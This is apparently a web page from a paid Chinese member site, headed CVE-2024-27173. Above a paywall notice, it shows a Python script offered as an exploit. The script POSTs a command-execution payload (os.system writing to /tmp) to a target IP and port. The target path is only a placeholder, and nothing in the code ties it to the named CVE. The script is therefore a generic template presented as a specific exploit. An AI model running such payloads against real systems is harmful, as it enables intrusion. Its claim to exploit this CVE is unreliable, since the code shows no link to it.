CVE-2024-27173

python:

import requests

# Target details
target_ip = "192.168.1.100"
target_port = 8080
vulnerable_path = "/path/to/vulnerable/script.py"
payload = """
import os
os.system('echo Exploited > /tmp/exploit.txt')
"""

# Construct the exploit URL and payload
exploit_url = f"http://{target_ip}:{target_port}{vulnerable_path}"
headers = {
    'Content-Type': 'application/x-www-form-urlencoded',
}
data = {
    'file': payload
}

# Send the malicious request
response = requests.post(exploit_url, headers=headers, data=data)

if response.status_code == 200:
    print("Exploit sent successfully!")
else:
    print("Failed to send exploit.")

 

 

CVE-2024-27173-棉花糖会员站
CVE-2024-27173
此内容为付费阅读,请付费后查看
9999积分
付费阅读
已售 2
© 版权声明
THE END
喜欢就支持一下吧
点赞11 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容